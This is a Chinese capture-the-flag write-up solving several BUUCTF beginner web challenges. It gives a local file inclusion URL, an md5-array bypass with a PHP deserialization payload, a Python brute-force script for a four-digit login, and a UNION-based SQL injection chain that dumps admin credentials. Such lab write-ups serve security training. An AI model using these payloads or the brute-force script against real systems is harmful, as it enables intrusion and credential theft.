IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> BUUCTF Basic 持续更新 -> 正文阅读

[PHP知识库]BUUCTF Basic 持续更新

Linux Labs

题目:ssh 用户名:root 密码:123456 地址和端口为动态分配的。
靶机信息
解题:
按照题目建立ssh连接
在这里插入图片描述
登录后,可以看到根目录中有flag
在这里插入图片描述

BUU LFI COURSE 1

题目:

<?php/** * Created by PhpStorm. 
* User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */
highlight_file(__FILE__);
if(isset($_GET['file'])) 
{  
 $str = $_GET['file'];  
 include $_GET['file'];
}

解题:
本次仅考察本地文件包含,尝试以下 /flag /flag.php等即可
访问:b620153a-a138-46ad-ab61-a7e010ffd0ec.node4.buuoj.cn:81?file=/flag
得到 flag{eafc4f81-1cff-47f4-88b3-26d1e4b10e91}

BUU CODE REVIEW 1

 <?php
highlight_file(__FILE__);
class BUU {
   public $correct = "";
   public $input = "";
   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}
if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

解题:
1、 pleaseget传参为1,pleasepost 传参为2;
2、md51md52是值不等,但是md5值相等,可以用

240610708
QNKCDZO

或者两者都用数组的 md51[]=1 & md52[]=2
3、由于在反序列化中 ,用到的是===,那么我们需要使用覆盖赋值
搭建一个php环境

<?php
class BUU {
  public $correct = "";
  public $input = "";
}
$a = new BUU;
$a->input = &$a->correct;
echo Serialize($a);

得到了的值为O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
4、组合起来,我们提交的数据为

get数据:  ?pleaseget=1
post数据: pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

在这里插入图片描述5、得到的flag为
flag{e1bb1936-0d27-445f-baa9-1fbc7505105f}

BUU BRUTE 1

1、随意登录,发现有提示,密码是4位数字
在这里插入图片描述2、打开burp进行爆破,发现会爆429错误,不是很好判断

3、写python代码,把fail的可以再跑,慢慢排除

import requests
import time

url = 'http://2f43b391-c709-4d45-8391-ec0a07edf692.node4.buuoj.cn:81/?username=admin&password='

fail = []
s = requests.session()
for i in range(10000):
    u = url + (str(i).zfill(4))
    result = s.get(u).text
    print('try:',i)
    if '密码错误' not in result:
        print(result)
        if '429' in result:
            fail.append(str(i).zfill(4))
print(fail)

4、获得结果,密码为6490
在这里插入图片描述5、flag为

flag{0409f0fb-cd71-4c42-9979-a72dc83a94e2}

BUU SQL COURSE 1

题目:
在这里插入图片描述
解题:
1、随意点击一个新闻,发现url没有变化,且输入'也无反应。
2、F12按下,发下有新的url
在这里插入图片描述3、对这个url进行sql注入

/backend/content_detail.php?id=1# 正常显示
/backend/content_detail.php?id=1 order by 2# 有两列
/backend/content_detail.php?id=-1 union select 1,2# 都可以回显	
/backend/content_detail.php?id=-1 union select 1,database()# 数据库为 news
/backend/content_detail.php?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# 表名为 admin contents
/backend/content_detail.php?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='contents'# contents 的字段为 "id,title,content"
/backend/content_detail.php?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'# contents 的字段为 "id,username,password"
/backend/content_detail.php?id=-1 union select username,password from admin#  得到密码 0459d544eb2117339fe32550d5b98264

4、尝试登录以下
在这里插入图片描述5、得到flag
flag{d4a936a6-3df2-4704-b1c1-49d1b230a1ab}

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-12-28 22:41:54  更:2021-12-28 22:41:56 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 20:46:20-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计